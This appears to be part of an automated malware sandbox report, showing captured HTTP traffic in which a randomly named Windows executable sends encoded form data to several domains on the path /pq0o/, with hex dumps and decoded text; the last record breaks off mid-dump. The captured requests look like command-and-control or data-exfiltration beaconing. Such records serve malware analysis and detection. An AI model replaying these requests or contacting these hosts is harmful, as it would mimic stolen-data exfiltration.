49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49762	74.208.236.153	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:30.494770050 CEST	10737	OUT	POST /pq0o/ HTTP/1.1 Host: www.klconstructions.net Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.klconstructions.net Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.klconstructions.net/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6b 30 6d 4d 2b 33 62 33 64 43 56 45 7a 72 37 4d 36 77 73 7a 51 72 78 4b 4f 4a 4a 37 30 4b 66 57 50 32 79 59 4c 68 55 43 44 76 78 76 32 47 69 4a 76 6a 6d 37 78 4a 63 54 51 31 58 65 65 7a 42 4c 6a 30 56 4c 77 50 46 4d 39 50 6c 46 45 5a 50 78 2b 2b 57 38 72 50 67 76 42 43 62 6f 4c 43 73 42 70 64 4f 52 7a 55 64 41 30 46 4d 68 59 32 65 64 65 69 71 6f 44 64 32 6c 48 5a 47 57 6e 36 50 58 6a 77 74 61 64 4e 47 70 65 65 31 4b 66 38 50 6e 63 4b 4d 4d 6a 42 76 70 57 2f 42 75 57 42 65 76 54 31 2f 36 68 64 41 72 57 38 35 55 6a 34 37 73 7a 6a 67 74 51 72 6f 54 49 2f 43 4f 6f 52 35 4c 2b 31 45 79 6c 37 41 6c 6b 50 65 68 72 32 48 39 58 37 51 59 47 54 4f 4e 4d 6c 43 51 4e 6c 5a 79 45 4f 30 63 71 6f 43 41 71 37 78 63 47 76 6c 48 73 4a 43 54 4f 4b 6d 42 56 69 6a 4e 52 49 4c 64 45 63 6e 53 4d 62 73 59 4c 38 6b 61 72 34 7a 58 57 65 6b 52 6f 41 51 44 45 5a 71 78 43 75 58 53 2f 58 56 49 33 68 58 53 6e 36 31 65 66 55 79 61 32 69 6f 6e 42 4f 71 41 68 68 2b 61 53 35 76 6d 56 7a 79 70 6d 4f 6d 72 42 77 7a 36 76 4a 48 71 68 6f 53 4a 32 33 58 69 47 47 31 70 67 76 31 49 42 50 59 63 33 6a 6b 61 4e 5a 6a 33 57 5a 7a 69 62 41 6d 78 59 44 32 64 51 48 52 55 35 4d 52 6a 6d 64 31 6f 50 4e 2b 4d 66 79 68 44 61 38 77 38 75 51 4a 31 6f 7a 6f 64 6f 46 46 6d 36 7a 59 52 53 4a 6d 36 59 63 6a 52 67 6f 46 46 6d 71 4d 2b 46 43 35 6a 46 67 77 4b 4c 64 53 6b 4d 57 6c 68 52 71 2f 79 38 4f 32 78 53 42 64 38 58 73 4b 4f 44 72 53 65 35 48 58 77 79 44 59 2f 41 47 52 46 63 42 67 31 45 53 44 4f 67 31 4a 65 48 58 51 66 74 79 43 54 65 77 41 36 79 75 7a 30 66 74 47 78 65 5a 70 4e 35 2f 67 2f 4d 6f 35 59 41 4c 4b 6b 4f 31 4c 79 36 70 57 6f 48 4e 4c 65 48 4c 73 58 71 63 67 2b 71 76 67 7a 69 7a 53 30 7a 67 43 62 6f 33 71 78 7a 46 57 46 57 52 48 72 6c 6b 35 6a 4d 72 39 72 66 6c 55 48 7a 36 66 6b 57 33 66 59 54 2b 39 72 61 35 79 4e 76 37 6b 73 30 58 34 39 57 58 55 35 59 6a 51 50 39 5a 70 62 4f 69 4d 49 6e 4b 6c 51 72 59 6c 4d 36 33 46 78 6c 78 50 62 47 76 66 50 42 4e 57 6e 4d 38 6d 59 38 41 57 4b 53 51 65 64 74 45 65 61 49 75 65 55 67 6f 76 67 77 75 6a 53 6c 36 6e 4c 53 58 4c 2f 69 46 34 79 48 6f 55 65 2f 45 6d 57 2f 69 65 62 57 2b 6a 78 72 79 7a 68 69 59 72 72 73 44 6a 5a 39 6a 42 48 4f 6a 6f 2f 63 57 44 59 6a 70 63 58 4e 30 4a 75 59 4e 38 50 66 4a 72 41 32 77 68 78 71 69 73 4d 4c 42 34 66 58 77 4a 45 51 36 72 34 34 42 35 38 62 51 5a 6b 6e 50 6d 4a 50 55 51 5a 50 2b 5a 32 4b 6e 58 6c 63 79 70 61 35 34 53 38 2f 4d 42 44 48 43 6b 59 36 48 6f 2f 69 36 4c 61 4d 4a 6f 55 76 67 43 66 5a 76 73 34 47 2f 4b 65 76 4e 67 30 33 50 61 63 69 38 77 6c 49 51 42 41 4b 4e 46 50 4c 63 72 46 56 56 55 4d 5a 53 54 6f 4f 7a 65 69 65 52 71 42 48 45 7a 64 2f 7a 76 53 4c 45 44 62 72 4c 49 6f 4c 4e 69 62 42 47 76 4d 46 34 56 49 5a 30 52 33 69 75 57 43 6c 76 52 73 66 53 58 64 44 64 59 56 30 5a 54 4b 46 46 36 6a 76 57 33 46 52 34 33 57 37 79 48 5a 69 38 6c 37 71 4b 4f 55 67 4c 4f 67 7a 69 42 74 37 55 65 47 56 39 71 66 51 74 35 49 55 67 47 45 4c 57 67 65 54 31 70 59 62 59 67 55 56 57 46 74 43 74 63 36 67 38 75 6d 46 68 55 58 76 52 38 6f 6a 54 7a 76 62 75 4a 52 55 62 2b 50 67 4a 75 75 42 4c 70 64 38 38 6f 77 5a 72 53 45 34 6e 42 6d 41 73 55 57 33 68 57 41 57 70 6e 70 75 48 52 35 78 45 2b 39 4c 4c 72 37 44 55 74 33 4a 68 77 37 70 4d 49 4f 61 51 6e 32 71 4f 4d 49 70 66 48 46 45 64 6f 6f 33 54 58 71 71 4f 2f 4d 38 36 59 58 2f 77 48 41 42 58 7a 48 44 59 77 6c 61 31 32 4b 5a 69 36 4e 47 65 4b 56 38 7a 70 6b 43 34 37 4e 41 6c 37 71 32 43 43 75 6b 52 4c 6e 66 69 55 58 78 4e 6f 68 7a 33 78 71 68 32 71 33 72 53 4a 6c 4e 67 78 6c 48 4b 6a 59 74 61 52 4a 33 65 59 79 6f 39 72 45 50 4c 46 55 68 62 59 36 74 32 7a 75 69 58 71 31 56 4c 44 6e 4f 4f 53 76 31 63 6e 35 34 72 30 53 36 63 35 43 50 30 6e 76 7a 55 70 43 2b 2b 76 35 50 57 74 55 49 51 57 34 52 61 6e 77 4b 59 4c 31 64 76 4c 30 5a 64 48 6c 79 55 6c 79 48 46 4e 77 51 74 39 6c 32 51 53 75 70 50 39 68 71 30 53 65 76 76 65 31 53 46 4c 6a 77 6d 30 76 68 74 42 73 44 6d 71 31 59 33 38 37 44 37 32 48 6f 67 2f 67 52 79 6a 65 59 38 6d 6a 35 6c 2b 4a 6d 59 58 75 30 38 38 78 73 2f 4f 67 77 33 53 36 4b 61 67 33 67 42 72 2f 7a 45 2b 72 70 75 41 38 78 74 71 36 35 Data Ascii: F49hs=k0mM+3b3dCVEzr7M6wszQrxKOJJ70KfWP2yYLhUCDvxv2GiJvjm7xJcTQ1XeezBLj0VLwPFM9PlFEZPx++W8rPgvBCboLCsBpdORzUdA0FMhY2edeiqoDd2lHZGWn6PXjwtadNGpee1Kf8PncKMMjBvpW/BuWBevT1/6hdArW85Uj47szjgtQroTI/COoR5L+1Eyl7AlkPehr2H9X7QYGTONMlCQNlZyEO0cqoCAq7xcGvlHsJCTOKmBVijNRILdEcnSMbsYL8kar4zXWekRoAQDEZqxCuXS/XVI3hXSn61efUya2ionBOqAhh+aS5vmVzypmOmrBwz6vJHqhoSJ23XiGG1pgv1IBPYc3jkaNZj3WZzibAmxYD2dQHRU5MRjmd1oPN+MfyhDa8w8uQJ1ozodoFFm6zYRSJm6YcjRgoFFmqM+FC5jFgwKLdSkMWlhRq/y8O2xSBd8XsKODrSe5HXwyDY/AGRFcBg1ESDOg1JeHXQftyCTewA6yuz0ftGxeZpN5/g/Mo5YALKkO1Ly6pWoHNLeHLsXqcg+qvgzizS0zgCbo3qxzFWFWRHrlk5jMr9rflUHz6fkW3fYT+9ra5yNv7ks0X49WXU5YjQP9ZpbOiMInKlQrYlM63FxlxPbGvfPBNWnM8mY8AWKSQedtEeaIueUgovgwujSl6nLSXL/iF4yHoUe/EmW/iebW+jxryzhiYrrsDjZ9jBHOjo/cWDYjpcXN0JuYN8PfJrA2whxqisMLB4fXwJEQ6r44B58bQZknPmJPUQZP+Z2KnXlcypa54S8/MBDHCkY6Ho/i6LaMJoUvgCfZvs4G/KevNg03Paci8wlIQBAKNFPLcrFVVUMZSToOzeieRqBHEzd/zvSLEDbrLIoLNibBGvMF4VIZ0R3iuWClvRsfSXdDdYV0ZTKFF6jvW3FR43W7yHZi8l7qKOUgLOgziBt7UeGV9qfQt5IUgGELWgeT1pYbYgUVWFtCtc6g8umFhUXvR8ojTzvbuJRUb+PgJuuBLpd88owZrSE4nBmAsUW3hWAWpnpuHR5xE+9LLr7DUt3Jhw7pMIOaQn2qOMIpfHFEdoo3TXqqO/M86YX/wHABXzHDYwla12KZi6NGeKV8zpkC47NAl7q2CCukRLnfiUXxNohz3xqh2q3rSJlNgxlHKjYtaRJ3eYyo9rEPLFUhbY6t2zuiXq1VLDnOOSv1cn54r0S6c5CP0nvzUpC++v5PWtUIQW4RanwKYL1dvL0ZdHlyUlyHFNwQt9l2QSupP9hq0Sevve1SFLjwm0vhtBsDmq1Y387D72Hog/gRyjeY8mj5l+JmYXu088xs/Ogw3S6Kag3gBr/zE+rpuA8xtq65vYEv1L8Zb5pWtm1dV8f/9zWwMM53NujYfbkyutPRJkhtg7r6MF4YZMB7CH3OFFjNgxBIen4IHrYpMRzi39xSmKogL+oKaluKm52kYwXdi2FdGB/CC6SAthis3ATIgwYesfhSLDYs211teX2n5JFWoGrgY3CdvnbXSu3Vn6ehcMZwWdSiwZHDVduUF2Cap8bUhTI++TTCUj6r60UkNC7AGlK7m2i7HfzCXKdsU4ETV3RBZ55AJDbFLrSEkbXGgzjJeSW0JcddyFXjmRLOff7oKQDRUlxIEY/9hi9midVDUFHGRMhDxYKK4fSrF9LKUMWlOTprR28rs4x4sF21jO8An0ZYiOei13pILm9lQjACnrlupg6iCnMkNQN5MLHeZPMR5cmVGSHNNvWqDwrtvYsVORSd2Ri8QFe2rI8WFn0n0TooKztZO7paxLxe8XSQ3pm1jCQSypfhA8tRqLAJIvyhsQxd4KeQWKl8N9bId5tDOf9D7sScuL25BPuops0k6AXJNnJRnxF2G5EGjzM70spfW5d7WDWz96Z6KLMoS3Ci9IvtdOdMMWGa4iy2HC99SoxIQCj/l+Zw7XNat6voRqfnqwMyonFS6eHEY4rgzl3zDdi9435ktC/zcZ4xQ4U1QBhJvHHtXiYWwSX6jhnOLrnsUbruyC7IrmPT7Tx8FavNMfbuqbl+j6CHiRYd9nP5Tt4Y7mlkM/aPFZn4Ac4yj278hQGDGprRvSwNvGErncmTqNM3w5sq4Kn04jbQ2UBe5vyhw04eNXf3ZKOKojxdWcZ3VF0KjAkJgoT7UTki/JoEnStHEP3RRvlNCbGymCCPPpkPjA/xbo41upjHqmBZXFh7GmzcbT/FKSQHe8Vfm/0Pyb0tDwZWDtHSRjibph8ZUeIG3xDSB9TSP80pjB1+ySGE8bSj3CvsgTyeP2YZtR13EIp+fs/znjboqMvwHD/awwGaudybmPbR4rOR1U90IY0sL5AuN0NDwFNQLP+Uxt9JgCQmzvR2n0LeiOqa6CWVBYQS5GiyaYQoaAe6BvKU9+0N5lM1IDSLT3BtjggJH8/pHpY7OinYzRV8WGcS/kyOx0H9uAM1DDRJGf52w/RCftUDbBus3R5ds6vfWVm2q2adNZqyXAzBCgMm5RbIj5AtMslIEO9ftuvyeD72CwlRD3DnwZdBP2lRpW90tjtg1jmgdY6dQBH19g1naaMw3O7z5+8URy/onbc5iYUbFgikWCKhSecTZCLObaav+DsEUH1M5cqsUf/LZteOkqFRjKlywED3/aheSCIdaACjv/42zbjbZ94+3Lb+cuUyzrfAGDlplerYQVuTUv4oaLwsIxqmiTp1+66/ykEJXRuaXTQElQrokXAHwAQAOXnnHaT3AHjVCYYJmx9ZxTSiPz/bWH8rov9+qpApAnZ8s8OnZWiMETN6yGp+rEMCOZTHNFas4chX13cqGjMsESWB2dxxEuYnUCm3QM37qgbIIqX2XUuOsKSSGbGs/dtT+DSC7gFmQzD28flyrKOBEDErvqB4V/xoIK+ZZq+mhDDQOrfIqpHU2bBpCxyy7EHgvPqTwoou9F7JQAG8fEfa5g8KvjJ5noG5LqopsRA/pQQlNHP/0KGyXq6U4tlq509/1pon8uZodfl3r/A6QEUC0/UjgcQ5lmh9hoDYbH4gfkFjLBBM/0IgCio6nMpWJrkSrxcFmLOZl7GRwfl7dxyHNIsVC2IFf7il6oFqnKSQoUaIEpv2Zy2Z3PSlgCDpB1Kao+b8rfrOPxPHExl+wJTqttHQnqiiLHx1n/v0Xl3gHi6WqjnKcYFmDtrp3nG3vmrRqXJYBghMDvgijtu/l7WF8hKjWJ70SRDtHjrFEVt94Fgi+H+WFMk2NGARGhWJVVEYWHR/yGG7SFjWrZhaE4EljuxFzi8avX89k3yr9zVZvbBxwMlbkAAquf0GaMkLJ8nsIxtiIOVhxNHN0S/H0/8toO0uxPA2wW2ZRuEM65DWWH/G6Xfqq1iOkLuwaxM0jBAou7/+pMwuGYBt6UQc3B94F0PFHjksakkheLpfscTIFue6WF1ZcgcXiaN5EVGUwoIxPTGoXiritLkUbaqJnRzO14AnmUOT5S8UAiTxHG2+8jiVvpgiZVkELsEoxjp9O9mwt2Kw3WQHUJBSUdUl/6CSbFlnjHfqIinOLOr7hBupEZacCTVfZk1jGJOLHv5EIE4vJskowP6QvcHIc0ywp0pXHKjGj75zl8LH8mXDfpr13Sr5zvp8uCxlREhgDhxvkwoonxg/DuyJ2lckUdiKjq62fM2+E+uoJbUQPVM1kbCR+bl3nfanhbsQJZkvtoNGL3FJZBHOCmIivv95gmHcoySi60r8OPZFjZKGRGe3WhZp9RpaMRDCg7NOMoB9Nsbqlt560+ByZyhMi4VJcYIZZrRqttkJiH21l0mF0wAafe3aLty9mX7MeKyk1I2ZebhxN4m7gZiZXSh5XRaYjrXhtcxPtMsCixiaoDswKnPWvm1SeinWAWuw68iZ7HAXi3VWYk55TXeBjf7EsKO8AbT0Rg84EXqffHWLcFSAfOZaj9OqbBf3+jRe1V3/rfAtUZ8RCytlUvgN975Au1b2L9CuooM6QhPVKpg7fWbytv2KMrnPEpo0vWFSmdj4RW6pcldzLKCAKR8HVQTunvX6IEPYcZ1g19Az9gQ0nHvku7wTFR8FTRvSQ+edNoTmy91exAkk5zTAez+na3z
Apr 24, 2024 09:22:30.697737932 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 24 Apr 2024 07:22:30 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	74.208.236.153	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:33.236217022 CEST	365	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=p2Os9DL/ZxMFxY/q2Ap/Yp5OBLYS19DXFnG8XGpKHfd79mzMsmb8450rEHnCTj1drUgFrotC1uV7Mqyg6tK80c0eBV3oPBtu8fCz/gVC+CE8Jn7lRxODf9w= HTTP/1.1 Host: www.klconstructions.net Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:22:33.441088915 CEST	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Wed, 24 Apr 2024 07:22:33 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:39.172365904 CEST	617	OUT	POST /pq0o/ HTTP/1.1 Host: www.kakaobrain.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.kakaobrain.us Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.kakaobrain.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 4d 6a 42 34 6a 4f 48 34 4f 70 48 69 6f 50 55 73 43 4d 56 49 65 50 70 32 2b 46 75 4e 79 68 33 45 37 65 6e 63 73 7a 47 79 75 48 79 4c 76 4f 64 56 50 6d 4a 63 32 77 49 4e 71 2b 63 57 4e 6c 2f 68 71 72 39 2b 54 70 77 75 48 6f 65 48 66 39 78 44 49 75 35 57 62 30 4c 34 30 69 52 6f 4e 71 57 37 31 78 41 59 77 63 4e 6c 4f 43 31 4d 66 63 64 41 64 31 45 31 48 47 61 55 30 64 6e 61 33 62 58 67 67 70 55 42 45 79 67 4d 70 57 71 69 6f 35 49 6b 79 35 44 62 4c 59 6f 42 78 46 2b 57 48 58 37 66 52 39 61 63 79 6d 55 49 6b 77 34 77 48 33 56 41 30 47 53 56 49 56 59 54 67 4f 51 6e 4d 4d 32 50 66 41 3d 3d Data Ascii: F49hs=MjB4jOH4OpHioPUsCMVIePp2+FuNyh3E7encszGyuHyLvOdVPmJc2wINq+cWNl/hqr9+TpwuHoeHf9xDIu5Wb0L40iRoNqW71xAYwcNlOC1MfcdAd1E1HGaU0dna3bXggpUBEygMpWqio5Iky5DbLYoBxF+WHX7fR9acymUIkw4wH3VA0GSVIVYTgOQnMM2PfA==
Apr 24, 2024 09:22:39.479015112 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:22:39 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49765	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:42.010854959 CEST	637	OUT	POST /pq0o/ HTTP/1.1 Host: www.kakaobrain.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.kakaobrain.us Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.kakaobrain.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 4d 6a 42 34 6a 4f 48 34 4f 70 48 69 6e 4d 38 73 48 72 4a 49 4a 2f 70 78 69 31 75 4e 38 78 33 49 37 65 72 63 73 32 6d 69 75 31 47 4c 75 73 46 56 64 33 4a 63 36 51 49 4e 7a 4f 63 58 44 46 2f 75 71 71 41 4c 54 70 38 75 48 70 2b 48 66 38 42 44 4a 66 